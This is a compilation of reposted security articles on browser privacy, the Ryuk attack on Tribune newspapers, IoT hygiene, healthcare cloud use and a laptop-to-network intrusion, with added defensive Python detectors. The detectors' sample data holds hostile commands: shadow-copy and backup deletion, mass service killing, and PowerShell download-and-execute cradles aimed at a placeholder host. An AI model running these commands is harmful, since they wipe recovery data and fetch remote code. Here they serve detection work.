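    "debugger", "nativeMessaging", "proxy", "management",
}
MEDIUM_RISK_PERMISSIONS = {
    "tabs", "cookies", "history", "webNavigation", "scripting",
    "clipboardRead", "downloads", "bookmarks", "geolocation",
}

# Chrome match pattern: <scheme>://<host>/<path>
MATCH_PATTERN = re.compile(r"^(\*|https?|ftp|file|chrome-extension)://([^/]*)(/.*)$")


def parse_match_pattern(pattern):
    """Split a match pattern into (scheme, host, path); None if it is not one."""
    if pattern == "<all_urls>":
        return ("*", "*", "/*")
    m = MATCH_PATTERN.match(pattern)
    return m.groups() if m else None


def is_broad_pattern(pattern):
    """True for patterns reaching every site (host '*') or the whole local disk (file://)."""
    parsed = parse_match_pattern(pattern)
    return parsed is not None and (parsed[1] == "*" or parsed[0] == "file")


def audit_manifest(manifest):
    """Classify one manifest (Manifest V2 or V3) as low / medium / high risk."""
    declared = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    # MV2 mixes host patterns into "permissions"; MV3 keeps them in host_permissions.
    host_patterns = {p for p in declared if parse_match_pattern(p) is not None}
    api_permissions = declared - host_patterns
    host_patterns |= set(manifest.get("host_permissions", []))
    host_patterns |= set(manifest.get("optional_host_permissions", []))
    # A content script injected into every page is host access too.
    for script in manifest.get("content_scripts", []):
        host_patterns |= set(script.get("matches", []))

    broad = sorted(p for p in host_patterns if is_broad_pattern(p))
    high = sorted(api_permissions & HIGH_RISK_PERMISSIONS)
    medium = sorted(api_permissions & MEDIUM_RISK_PERMISSIONS)
    if broad or high:
        level = "high"
    elif medium:
        level = "medium"
    else:
        level = "low"
    return {
        "name": manifest.get("name", "?"),
        "manifest_version": manifest.get("manifest_version"),
        "broad_host_access": broad,
        "high_risk": high,
        "medium_risk": medium,
        "level": level,
    }


def audit_extensions_dir(root):
    """Walk a profile's Extensions directory (Chrome stores each installed
    extension as <id>/<version>/manifest.json) and audit every manifest found."""
    reports = []
    for dirpath, _dirs, files in os.walk(root):
        if "manifest.json" in files:
            with open(os.path.join(dirpath, "manifest.json"), encoding="utf-8") as fh:
                reports.append(audit_manifest(json.load(fh)))
    return reports


# Constructed sample manifests (not real extensions).
SAMPLE_MANIFESTS = [
    {"name": "Quick Notes", "manifest_version": 3,
     "permissions": ["storage"],
     "host_permissions": ["https://notes.example.invalid/*"]},
    {"name": "Coupon Finder", "manifest_version": 3,
     "permissions": ["tabs", "cookies", "scripting", "webRequest"],
     "host_permissions": ["<all_urls>"],
     "content_scripts": [{"matches": ["*://*/*"], "js": ["inject.js"]}]},
    {"name": "Legacy Toolbar", "manifest_version": 2,
     "permissions": ["tabs", "http://*/*"]},
]

if __name__ == "__main__":
    for report in (audit_manifest(m) for m in SAMPLE_MANIFESTS):
        print(f"{report['name']:<15} {report['level']:<6} broad={report['broad_host_access']} "
              f"high={report['high_risk']} medium={report['medium_risk']}")
```

Point `audit_extensions_dir` at your profile’s Extensions folder (on macOS, for example, `~/Library/Application Support/Google/Chrome/Default/Extensions`) to run it over what is actually installed; the “Coupon Finder” sample shows the combination to worry about: every site, plus the ability to read cookies and rewrite requests.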

These plug-ins and extensions can protect you

There are some extensions that are worth their weight in gold. You should consider:

  • An ad-blocker: Ad-blockers are great for blocking ads, as the name suggests, but also the privacy-invasive code that can track you across sites. uBlock is a popular, open-source, efficient blocker that doesn’t consume as much memory as AdBlock and others. Many ad-blockers now permit “acceptable ads”, which let publishers still make money from ads that aren’t memory hogs or intrusive, like the ones that take over your screen. Ad-blockers also make websites load much faster.
  • A cross-site tracker blocker: Privacy Badger is a great tool that blocks tiny “pixel”-sized trackers that are hidden on web pages but track you from site to site, learning more about you to serve you ads. To advertisers and trackers, it’s as if you vanish. Ghostery is another example of an advanced-level anti-tracker that aims to protect the user by default from hidden trackers.

And you could also consider switching to more privacy-minded search engines, like DuckDuckGo, a popular search engine that promises to never store your personal information and doesn’t track you to serve ads.

Use Tor if you want a better shot at anonymity

But if you’re on the quest for anonymity, you’ll want Tor.

Tor, known as the anonymity network, is a protocol that bounces your internet traffic through a series of relay servers dotted across the world, wrapping it in layers of encryption so that no single relay knows both who you are and where you’re going. You can configure it on most devices and routers. Most people who use Tor will simply use the Tor Browser, a preconfigured and locked-down version of Firefox that’s good to go from the start, whether for a regular website or an .onion site, a special top-level domain used exclusively for websites accessible only over Tor.
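As an added illustration (not from the TechCrunch guide or the Tor Project’s own code) of why .onion names are special: a v3 onion address is the service’s Ed25519 public key plus a two-byte checksum and a version byte, base32-encoded, so the name itself authenticates the service and a typo or a tampered address can be caught offline. The Python below implements the encoding and the check as the Tor rendezvous v3 specification defines them; the sample key is a constructed placeholder, not a real hidden service’s key.

```python
"""Encode and validate Tor v3 .onion addresses (added example)."""
import base64
import binascii
import hashlib

# rend-spec-v3: onion_address = base32(PUBKEY | CHECKSUM | VERSION) + ".onion"
#               CHECKSUM      = SHA3-256(".onion checksum" | PUBKEY | VERSION)[:2]
#               VERSION       = 0x03
ONION_VERSION = b"\x03"
CHECKSUM_PREFIX = b".onion checksum"
ADDRESS_LENGTH = 56  # 35 bytes * 8 bits / 5 bits per base32 character


def onion_checksum(pubkey: bytes) -> bytes:
    return hashlib.sha3_256(CHECKSUM_PREFIX + pubkey + ONION_VERSION).digest()[:2]


def encode_onion_address(pubkey: bytes) -> str:
    """Build the .onion hostname for a 32-byte Ed25519 public key."""
    if len(pubkey) != 32:
        raise ValueError("Ed25519 public key must be exactly 32 bytes")
    raw = pubkey + onion_checksum(pubkey) + ONION_VERSION
    return base64.b32encode(raw).decode("ascii").lower() + ".onion"


def decode_onion_address(address: str):
    """Return (pubkey, reason); pubkey is None and reason explains any rejection."""
    host = address.strip().lower()
    if host.endswith(".onion"):
        host = host[: -len(".onion")]
    if len(host) != ADDRESS_LENGTH:
        return None, f"expected {ADDRESS_LENGTH} characters, got {len(host)} (v2 addresses were 16)"
    try:
        raw = base64.b32decode(host.upper())  # 56 chars decode to exactly 35 bytes
    except binascii.Error:
        return None, "not valid base32"
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34:]
    if version != ONION_VERSION:
        return None, f"unsupported version byte {version.hex()}"
    if checksum != onion_checksum(pubkey):
        return None, "checksum mismatch (typo or tampered address)"
    return pubkey, "ok"


def is_valid_onion_address(address: str) -> bool:
    return decode_onion_address(address)[0] is not None


if __name__ == "__main__":
    sample_key = bytes(range(32))  # constructed placeholder, not a real service key
    address = encode_onion_address(sample_key)
    print(address, "->", decode_onion_address(address)[1])
    # Flip a character that sits inside the checksum bytes: must be rejected.
    tampered = address[:52] + ("a" if address[52] != "a" else "b") + address[53:]
    print(tampered, "->", decode_onion_address(tampered)[1])
```

Because the key is in the name, there is no certificate authority to trust; the flip side is that a look-alike address that differs in a few characters is a different key entirely, so compare onion addresses from a trusted source in full rather than by eye.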

Tor makes it near-impossible for anyone to snoop on your web traffic, know which site you’re visiting, or that you are the person accessing the site. The one party that can still see what you send is the exit relay, if the site itself isn’t HTTPS, so the padlock still matters on Tor. Activists and journalists often use Tor to circumvent censorship and surveillance.

But Tor isn’t a silver bullet. Although the browser is the most common way to access Tor, it also — somewhat ironically — exposes users to the greatest risk. Although the Tor protocol is largely secure, most of the bugs and issues will be in the browser. The FBI has been known to use hacking tools to exploit vulnerabilities in the browser in an effort to unmask criminals who use Tor. That puts the many ordinary, privacy-minded people who use Tor at risk, too.

It’s important to keep the Tor browser up to date and to adhere to its warnings. The Tor Project, which maintains the technology, has a list of suggestions — including changing your browsing behavior — to ensure you’re as protected as you can be. That includes not using web plug-ins, not downloading documents and files through Tor, and keeping an eye out for in-app warnings that advise you on the best action.

Just don’t expect Tor to be fast. It’s not good for streaming video or accessing bandwidth-hungry sites. For that, a VPN would probably be better, with the caveat that a VPN only moves the trust from your ISP to the VPN provider, which can see everything your ISP could.

Resource taken from: https://techcrunch.com/2018/12/25/cybersecurity-101-guide-browse-web-securely-privately/ 

True North Lends a Hand

See what we’re up to:

philanthropy hands

TNN’s Philanthropy Committee continues to be busy; please visit the causes below that we supported during the last quarter of 2018!

Are you passionate about helping your community? 

Want to team up with TNN to make a difference? 

Are you a non-profit and in need of some assistance? TNN is here to help!

We would love to hear from you - please email Suzanne Ruse for more information!

North Korean Ransomware Attack Disrupts Major U.S. News Media

It was all over the news. A server outage at a major newspaper publishing company on Saturday prevented the distribution of many leading U.S. newspapers, including the Wall Street Journal, New York Times, Los Angeles Times, Chicago Tribune and Baltimore Sun. An early, unnamed source revealed they found files with a .RYK extension, and it looks like this might be a targeted ransomware attack using the specialized Ryuk ransomware family.

This strain is the latest incarnation of the earlier HERMES ransomware, which is attributed to the capable and active Lazarus Group that operates out of a Chinese city just north of North Korea and is reportedly controlled by the N.K. Unit 180 spy agency. Unlike spray-and-pray ransomware, Ryuk is mainly used for tailored attacks very similar to SamSam, and its encryption scheme is specifically built for focused infections, such that only crucial assets and resources are encrypted in each targeted network, carried out manually by the attackers.

Reality Check: "It Is Very Hard to Keep a State-Sponsored Bad Actor Out of Your Network"

Security experts believe that the Ryuk crew targets and penetrates selected companies one at a time, charging exceptionally large ransoms, either via spear phishing, RDP connections, or other yet unknown penetration techniques. Ryuk is not decryptable at the time of this writing, and it is very hard to keep a determined state-sponsored "Advanced Persistent Threat" bad actor out of your network. You really need to practice defense-in-depth, and even then...

Now, having said that, I admit it is in the early days and this attribution is more a gut-feel estimate rather than something proven by forensics. There are a lot of "false flag" operations going on, and someone else may have gotten hold of that code. Feels like N.K. though.

The infected publisher said in a statement Saturday that: "the personal data of our subscribers, online users, and advertising clients has not been compromised. We apologize for any inconvenience and thank our readers and advertising partners for their patience as we investigate the situation."

Any organization today needs to have weapons-grade backup procedures in place to restore production systems that have been compromised. I'm sure that they are doing exactly that; there are some IT heroes pulling all-nighters out there, I'm sure. Also, it could mean they decided not to pay the ransom. Good for them!

Ryuk-HERMES Similarities Are Clear as Daylight

The connections are pretty obvious, as shown by Check Point researchers who recently analyzed the two ransomware strains. They pointed at clear similarities between past Hermes strains and current Ryuk samples, which share large chunks of code:

  • The function that encrypts a single file is almost identical
  • Ryuk and Hermes use the same file marker for encrypted files
  • The check for the file marker is also identical
  • Both whitelist similar folders (e.g. “Ahnlab”, “Microsoft”, “$Recycle.Bin” etc.)
  • Both write a batch script named “window.bat” in the same path
  • Both used a similar script to delete shadow volumes and backup files

Ryuk versions for 32-bit and 64-bit systems were discovered, suggesting the ransomware can infect all types of systems, new and old alike. But there are also some differences. The main one is that Ryuk comes with a huge list of apps and services it shuts down before infecting a victim's systems. "The ransomware will kill more than 40 processes and stop more than 180 services by executing taskkill and net stop on a list of predefined service and process names," Check Point researchers explained in a report. This is one nasty piece of malware.
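What the Check Point list looks like on an endpoint is a dropped batch script, shadow-copy and backup deletion, and a burst of net stop / taskkill commands, all on one host within a few seconds. Here is an added Python hunting example (not KnowBe4’s or Check Point’s code) that scans process-creation events for that combination. The events are constructed sample data, not telemetry from this incident; the burst threshold and the particular commands hunted for (vssadmin, wmic shadowcopy, wbadmin, bcdedit, del of backup files) are this example’s choices.

```python
"""Hunt for ransomware pre-encryption behaviour in process-creation logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Commands run before encryption so that recovery from shadow copies and local
# backups fails (this example's hunting list, not Check Point's).
RECOVERY_SABOTAGE = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)", re.I),
    re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
    re.compile(r"\bdel\b.*\.(bak|bac|vhd|wbcat)\b", re.I),
]
# One net stop or taskkill is routine administration; dozens in a minute is not.
SERVICE_OR_PROCESS_KILL = re.compile(r"\b(net1?(\.exe)?\s+stop|taskkill(\.exe)?)\b", re.I)
DROPPED_BATCH = re.compile(r"\bwindow\.bat\b", re.I)


def hunt(events, burst_threshold=10, window=timedelta(seconds=60)):
    """events: iterable of (iso_timestamp, host, command_line).
    Returns {host: [finding, ...]} for hosts showing the pattern."""
    by_host = defaultdict(list)
    for ts, host, cmd in events:
        by_host[host].append((datetime.fromisoformat(ts), cmd))

    findings = defaultdict(list)
    for host, host_events in by_host.items():
        host_events.sort()
        kill_times = []
        for when, cmd in host_events:
            if DROPPED_BATCH.search(cmd):
                findings[host].append(f"batch script with the Ryuk/Hermes name: {cmd}")
            if any(p.search(cmd) for p in RECOVERY_SABOTAGE):
                findings[host].append(f"recovery sabotage: {cmd}")
            if SERVICE_OR_PROCESS_KILL.search(cmd):
                kill_times.append(when)
        # Sliding window over the kill commands: peak count inside `window`.
        peak, start = 0, 0
        for end in range(len(kill_times)):
            while kill_times[end] - kill_times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= burst_threshold:
            findings[host].append(
                f"{peak} net stop/taskkill commands within {int(window.total_seconds())}s")
    return dict(findings)


def ts_at(second):
    return f"2018-12-29T01:12:{second:02d}"


# Constructed sample events (not real telemetry). Service and process names are
# the kind a ransomware kill list targets, chosen here for illustration only.
SERVICES = ["MSSQLSERVER", "SQLWriter", "MSExchangeIS", "VeeamBackupSvc", "AcrSch2Svc",
            "BackupExecAgent", "vss", "SstpSvc", "swi_service", "McAfeeFramework",
            "ccEvtMgr", "SavRoam", "DefWatch", "wrapper", "MSSQL$SQLEXPRESS",
            "SQLAgent$SQLEXPRESS", "SQLBrowser", "MySQL", "OracleServiceORCL", "Sophos"]
PROCESSES = ["sqlservr.exe", "sqlwriter.exe", "outlook.exe", "excel.exe", "winword.exe",
             "veeam.exe", "mysqld.exe", "oracle.exe", "ocssd.exe", "dbsnmp.exe",
             "synctime.exe", "agntsvc.exe", "isqlplussvc.exe", "xfssvccon.exe", "thunderbird.exe"]
SAMPLE_EVENTS = [
    (ts_at(3), "PRINT-SRV01", r"C:\Windows\System32\cmd.exe /c C:\Users\Public\window.bat"),
    (ts_at(4), "PRINT-SRV01", "vssadmin Delete Shadows /all /quiet"),
    (ts_at(4), "PRINT-SRV01", "wmic shadowcopy delete"),
    (ts_at(5), "PRINT-SRV01", r"del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat"),
]
SAMPLE_EVENTS += [(ts_at(6 + i), "PRINT-SRV01", f"net stop {svc} /y") for i, svc in enumerate(SERVICES)]
SAMPLE_EVENTS += [(ts_at(26 + i), "PRINT-SRV01", f"taskkill /IM {proc} /F") for i, proc in enumerate(PROCESSES)]
# A workstation where an admin bounced one service: must not alert.
SAMPLE_EVENTS += [
    ("2018-12-29T09:30:00", "WS-042", "net stop spooler /y"),
    ("2018-12-29T09:30:05", "WS-042", "net start spooler"),
    ("2018-12-29T10:02:11", "WS-042", "taskkill /IM notepad.exe /F"),
]

if __name__ == "__main__":
    for host, host_findings in hunt(SAMPLE_EVENTS).items():
        print(host)
        for finding in host_findings:
            print("  -", finding)
```

The shadow-copy deletion alone is worth an alert on a server, but the burst count is what separates a manual, hands-on-keyboard ransomware run from an admin restarting a service; feed it Sysmon event 1 or Windows 4688 command lines and tune the threshold to your environment.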

 

Resource: www.KnowBe4.com

What's Your Weakest Security Link?

Stephen Nardone, Director of the Security Practice at Connection, is a leader in the field of IT security risks, frameworks, assessment, strategy, and compliance. Stephen has been a CYTO/CSO for the Commonwealth of Massachusetts and has developed security strategies for multiple government and private sector organizations. With more than three decades in the field, Stephen understands that cyber threats and cyber attacks are part of today’s technology reality. It’s not a matter of if, but when the breach will happen. “Prepare for ‘the when,’” is one of his standard mantras.

Stephen recommends some very basic strategies to offer some protection from IoT cyber intruders:

  • Connection assessment: The first line of defense is common sense. Consider what you’re connecting to your network and understand that with IoT standards and protocols, security blind spots are inevitable. Only connect devices you need, and only if they are secured end-to-end.
  • Change passwords: Many plug-and-play IoT devices ship with open, default, or no passwords. Set a password and change it often. Remember that the Mirai attack targeted default passwords.
  • Purchase known technology: Stay away from knock-offs, unknown names, and unproven devices.
  • Install patches and update firmware: Many security issues are due to end users ignoring the latest patches and firmware updates. Cyber criminals target missing patches. Reputable companies are on the cutting edge of security and offer managed patching strategies to avoid cyber penetration.
  • User awareness training: Training employees on all the potential threats is the first course of action. The old saying “knowledge is power” goes a long way. Password and patch management, purchasing decisions, how things are connected to your network, and, of course, social engineering are key awareness training areas.
  • Data protection: Ensure that all users know their role in protecting critical data at rest, data in process, and data in motion. Take the time to identify and classify your sensitive data.

Resource: https://community.connection.com/understanding-the-internet-of-things-and-security-threats-you-never-knew-existed/?cm_mmc=buzzhive-_-user-32330-_-post-f70fd6e7-da21-47d1-8f7c-a07b0404e62c-_-LinkedIn

True North Networks Lends a Hand!

See what we’re up to:

philanthropy hands

TNN’s Philanthropy Committee continues to be busy; please visit the causes below that we supported during the last quarter of 2018!

  • Hundred Nights Inc. - a cold weather shelter and open doors resource center in Keene, NH
  • Prospect House - a men’s registered sober house in Keene, NH
  • Our Victims of Terror Fund through the Jewish Federation of Greater Pittsburgh, PA in memory of the victims, one of which was a personal loss to a TNN client
  • Phoenix House- - a substance abuse disorder treatment home in Keene and Dublin, NH

Are you passionate about helping your community? 

Want to team up with TNN to make a difference? 

Are you a non-profit and in need of some assistance? TNN is here to help!

 

We would love to hear from you - please email Suzanne Ruse for more information!

Infrastructure Reality Check: What Can Go in the Cloud, Really?

Some healthcare CIOs say it's time to move just about everything to the cloud, while others say not so fast.

Long-term cloud costs

The long-term costs of managing cloud services must be considered. Something can be very easy to use but not feasible from a cost-control perspective.

“Theoretically you do not want to go down the road of using a cloud solution just because it is easy, because it might come with a cost uplift,” he said. “Easy does not always translate into how things are operationalized, hence how things are paid for and managed and budgeted.”

So while ease of use is indeed a consideration, it seems like the big question still comes down to what can healthcare CIOs really put in the cloud today? On the security front, what data and applications can exist in the cloud?

Since 2013, Brookdale University Hospital and Medical Center’s electronic health record has been in the cloud.

“We are very careful with our patient data, we have taken a strong stance on the security aspect of that, constantly making sure that it is as good if not better than self-hosted,” said Tarlow of Brookdale. “Our ERP system is in the cloud, many of our ancillary systems have been in the cloud for five-plus years. Our interface engine.”

The technologies the provider organization has not yet moved to the cloud are the ones heavily dependent on bandwidth, where staff are not yet fully comfortable with the performance those last systems would get. Staff are strategizing on how to move them to the cloud.

Nearly everything to the cloud

Wellman of Comanche County Memorial Hospital said they are on track to move just about everything to a cloud/remote-hosted setting with very little left onsite.

“This currently includes our ambulatory applications, financials, time and attendance, and as we move to a new acute care application, we are requiring it to be offsite,” he explained. “We are in the process of selecting a new acute care EHR and we expect it to be offsite as well. In the past we felt the interfacing and processing power should all be local, but as we have experimented over the years we felt this is no longer an issue with speed, assuming you have robust ISPs with multiple pathways to reduce the chance of excessive downtime.”

These three healthcare executives are generous when it comes to what they feel a healthcare organization can put in the cloud. Is there anything they feel should not be in the cloud?

"We are very careful with our patient data, we have taken a strong stance on the security aspect of that, constantly making sure that it is as good if not better than self-hosted."

Eli Tarlow, Brookdale University Hospital and Medical Center

“We really have not found anything that cannot go to the cloud, although some associated performance issues could cause you to not pursue it wholly,” Wellman said. “For example, we see the benefit of pushing our DICOM images to the cloud, but only in a hybrid design where we have onsite equipment that can receive from the modalities and then push the image to a cloud without causing a delay in that process.”

A good hybrid design would allow the organization to appropriately size and maintain the onsite storage to build an image cache and allow for pre-fetching larger images to avoid excessive wait times when a provider wants older images for comparison such as mammography, he explained.

“I would also like to point out that this model is preferable to our facility because we are in tornado alley on the Oklahoma plains, so this is a big part of our disaster recovery and business continuity plans,” he added. “It is easier and much more affordable for us to establish emergency network connectivity than it is to build or contract for a fully functional secondary data center. That played a big role in our decision to move toward the cloud.”

Still some concern among CIOs

Right now, healthcare organizations remain slow to adopt cloud methodology for the use of protected health information, contended Earle of Kaleida Health.

“Among the reasons why is that there has to be a constant that the data does not leave the United States or countries that value intellectual property and patient confidentiality or sensitive data,” he said. “Until the businesses can guarantee that your data does not move outside of the areas and controls or some kind of geo-fence of that data, it becomes less and less practical that healthcare providers would whole-heartedly put their sensitive data into the cloud.”

It is starting to happen, though. Cloud companies now are starting to accommodate PHI and related rules and practices, he said.

“They are starting to put those guardrails onto the data, but there still is some level of hesitation among CIOs around the country to adopt the cloud solutions until there is much more comfort around the resiliency of that data within the cloud,” Earle said. “There has to be some level of breakthrough when it comes to the vendors that are offering cloud services and their complete understanding of how health delivery organizations operate and do all of the constraints.”

What should a CIO say to concerned peers in the C-suite asking questions about security? Tarlow of Brookdale University Hospital and Medical Center points to some standard activities within the IT department.

“We do routine audits on this every single year; we run a security audit against it to make sure,” he said. “But I would reverse the challenge and say what if it’s onsite, what additional technologies, personnel, bells and whistles, would we have onsite that we do not already have in the cloud? Aside from someone breaking into our building, but we have security guards and I assume all of the cloud vendors have security guards.”

Cloud vendors have deeper pockets

The cloud vendors can afford the redundancies that individual healthcare organizations may not be able to afford independently, he added.

“I would educate the executives on the risks and hazards and on the benefits of doing it onsite versus offsite, so they can really learn,” he said. “It is a scary world out there. It’s really about becoming the most secure.”

He added that he was CIO at Bellevue Hospital during Superstorm Sandy. The majority of that organization’s systems were offsite, including the EHR, he said.

“The hospital was challenged, patients were discharged to other hospitals because we had to evacuate,” he concluded. “It helped us that our EHR was hosted remotely. These are not things in our dreams anymore, these are things that are really happening. And they are validating our strategy.”

Resource: https://www.healthcareitnews.com/news/infrastructure-reality-check-what-can-go-cloud-really/page/0/1?mkt_tok=eyJpIjoiTlRnNE5EQmtOalJtTlRZeCIsInQiOiJmUDl4TkJqTDVKNDlCOCsxbm5waGVsM3A4S2hoVmt6NzI4UEVGcHFINWV2RWo3anhQNEVuemRPcWRNQVVKXC85YmU2SkhDQWdkOTJpVnhKUzQ0dVlyNlwvUVUzMkxybUZWUVFiUTFjUXUzTGRRMDJEbGljWjdKQnV5K0J3T3NvK3R1In0%3D

How One Hacked Laptop Led to an Entire Network Being Compromised

A corporate laptop being used in a coffee shop at a weekend was enough to allow a sophisticated cybercrime group to compromise an organization’s entire infrastructure.

The incident began when an employee of the manufacturer took their laptop to a coffee shop and used it to visit the website of one of the firm's partners.

The security researchers said the user visited the site after being directed there by a phishing email -- and that the site had been compromised by FakeUpdates, a malware and social engineering campaign affecting thousands of Joomla and Wordpress sites.

The malware shows users pop-ups which claim their browser software needs updating. In this instance, the laptop was then infected with the Dridex banking trojan and the PowerShell Empire post-exploit toolset.

The security software being used by the clothing company -- Crowdstrike didn't name the vendor -- relied on devices being inside the corporate network to pick up threats. As the laptop was being used outside the network, this incident didn't become apparent until the laptop was back in the office -- by which time it was too late.

The infected laptop then served as the attackers' entry point into the corporate network. From it they used PowerShell-based tooling to reach dozens of systems, compromising whatever the user's permissions allowed them to touch.

The attackers were also able to gather additional privileged account credentials by using Mimikatz, an open-source utility used to retrieve clear text credentials and hashes from memory, to gain access to servers and further move across the network.

"Local administrator privileges made it easier for the threat actor to access a multitude of endpoints by accessing just one account that linked them all. Once access to the domain was gained, it left the organization completely exposed," Bryan York, director of professional services at Crowdstrike told ZDNet.

This exposure allowed the attackers to install Framework POS malware on the retail store server with the intention of stealing credit card data.

Researchers have identified a cyber criminal group they call Indrik Spider as the culprits of the attack. The hacking operation has been active since 2014 and is heavily associated with Dridex and BitPaymer ransomware campaigns, which are thought to have netted the attackers millions of dollars.

It's the first time Indrik Spider has been associated with FakeUpdates, indicating that the group is expanding its operations as it continues to find new means of illicitly making money. Crowdstrike wouldn't say whether the campaign was successful in its goal or if credit card data was stolen from the company -- but there are lessons that organizations should take on board to avoid falling victim to similar campaigns.

Crowdstrike recommends that accounts should be segregated, and that end users shouldn't be given administrator privileges on their local systems. In this incident, the adversary abused a misconfiguration within the company's Active Directory that provided unnecessary privileges -- so the security firm recommends that organizations should regularly review Active Directory configurations across the entire global enterprise.

"Attackers used PowerShell or Windows Management Instrumentation in 20 percent of the cases we saw this year and businesses need to know how to better detect and protect against these," said York.
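York's 20 percent figure is the reason to look specifically at PowerShell and WMI command lines. As an added example (not CrowdStrike's code; the sample command lines are constructed, and the hostnames use the reserved .invalid TLD), the Python below decodes the base64/UTF-16LE payload behind PowerShell's -EncodedCommand flag and scores a command line on the traits a FakeUpdates-to-Empire style launcher shows: an encoded body, a download cradle, Invoke-Expression, a hidden window, and WMI remote process creation. The indicator list and the scoring threshold are this example's choices.

```python
"""Decode and score suspicious PowerShell / WMI command lines (added example)."""
import base64
import binascii
import re

# The flag that carries a base64-encoded, UTF-16LE PowerShell script.
ENCODED_FLAG = re.compile(r"-(encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Traits scored on the visible command line plus the decoded script.
INDICATORS = [
    ("download cradle", re.compile(
        r"New-Object\s+(System\.)?Net\.WebClient|DownloadString|DownloadFile|"
        r"Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("invoke-expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+(hidden|1)\b", re.I)),
    ("no profile", re.compile(r"-no?p(rofile)?\b", re.I)),
    ("wmi process creation", re.compile(
        r"wmic(\.exe)?\s.*process\s+call\s+create|Invoke-WmiMethod|Invoke-CimMethod", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline, threshold=3):
    """Score one process command line; suspicious when `threshold` traits co-occur."""
    decoded = decode_encoded_command(cmdline)
    indicators = []
    if ENCODED_FLAG.search(cmdline):
        indicators.append("encoded command" if decoded is not None else "encoded command (undecodable)")
    # Scan the command line with the opaque base64 blob removed, plus the decoded script,
    # so that the indicator regexes never fire on base64 noise.
    visible = ENCODED_FLAG.sub(" ", cmdline)
    text = visible + "\n" + (decoded or "")
    for name, pattern in INDICATORS:
        if pattern.search(text):
            indicators.append(name)
    return {"decoded": decoded, "indicators": indicators, "suspicious": len(indicators) >= threshold}


def encode_powershell(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not from the incident).
LAUNCHER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/launcher')"
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -noP -sta -w 1 -enc {encode_powershell(LAUNCHER_SCRIPT)}",
    "powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://cdn.example.invalid/s'))\"",
    f'wmic /node:FILESRV01 process call create "powershell -nop -w hidden -enc {encode_powershell(LAUNCHER_SCRIPT)}"',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Backup-Logs.ps1",
    f"powershell -EncodedCommand {encode_powershell('Get-Service | Where-Object Status -eq Stopped')}",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        report = analyze_command_line(line)
        print("SUSPICIOUS" if report["suspicious"] else "ok        ", report["indicators"])
```

The fourth and fifth samples are the point of the threshold: a signed maintenance script and an admin's encoded one-liner each trip at most one trait, while the launcher trips four or five, and the WMI sample shows the same payload being pushed to another host, which is the lateral movement the article describes.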

Resource: https://www.zdnet.com/article/how-one-hacked-laptop-led-to-an-entire-network-being-compromised/


Malware attack disrupts delivery of L.A. Times and Tribune papers across the U.S.

What first arose as a server outage was identified Saturday as a malware attack, which appears to have originated from outside the United States and hobbled computer systems and delayed weekend deliveries of the Los Angeles Times and other newspapers across the country.

Technology teams worked feverishly to quarantine the computer virus, but it spread through Tribune Publishing’s network and reinfected systems crucial to the news production and printing process. Multiple newspapers around the country were affected because they share a production platform.

The attack delayed distribution of Saturday editions of the Los Angeles Times and San Diego Union Tribune. It also stymied distribution of the West Coast editions of the Wall Street Journal and New York Times, which are printed at the Los Angeles Times’ Olympic printing plant in downtown Los Angeles.

By Saturday afternoon, the company suspected the cyberattack originated from outside the United States, but officials said it was too soon to say whether it was carried out by a foreign state or some other entity, said a source with knowledge of the situation.

“We believe the intention of the attack was to disable infrastructure, more specifically servers, as opposed to looking to steal information,” said the source, who spoke on condition of anonymity because he was not authorized to comment publicly. The source would not detail what evidence led the company to believe the breach came from overseas.

Tribune Publishing said in a statement Saturday that “the personal data of our subscribers, online users, and advertising clients has not been compromised. We apologize for any inconvenience and thank our readers and advertising partners for their patience as we investigate the situation.”

“Every market across the company was impacted,” said Marisa Kollias, spokeswoman for Tribune Publishing. She declined to provide specifics on the disruptions, but the company’s properties include the Chicago Tribune; Baltimore Sun; Capital Gazette in Annapolis, Md.; Hartford Courant; New York Daily News; South Florida Sun Sentinel and Orlando Sentinel.

No other details about the origin of the attack were immediately available and the motive remained unclear.

Tribune Publishing sold The Times and the San Diego Union-Tribune to Los Angeles biotech entrepreneur Dr. Patrick Soon-Shiong in June, but the two companies continue to share various systems, including software.

It’s unclear how many Times subscribers were impacted by late deliveries and the paper could not provide firm numbers, but a source said that a majority received their papers Saturday morning, albeit several hours late. The Times said that print subscribers who did not get their papers Saturday would receive them with their regularly scheduled delivery of the Sunday edition.

“We apologize to our customers for this inconvenience,” The Times said in a statement. “Thank you for your patience and support as we respond to this ongoing matter.”

The Times and the San Diego paper became aware of the problem near midnight on Thursday. Programmers worked to isolate the bug, which Tribune Publishing identified as a malware attack, but at every turn the programmers ran into additional issues trying to access a myriad of files, including advertisements that needed to be added to the pages or paid obituaries.

After identifying the server outage as a virus, technology teams made progress Friday quarantining it and bringing back servers, but some of their security patches didn’t hold and the virus began to reinfect the network, impacting a series of servers used for news production and manufacturing processes.

By late Friday, the attack was hindering the transmission of pages from offices across Southern California to printing presses as publication deadlines approached.

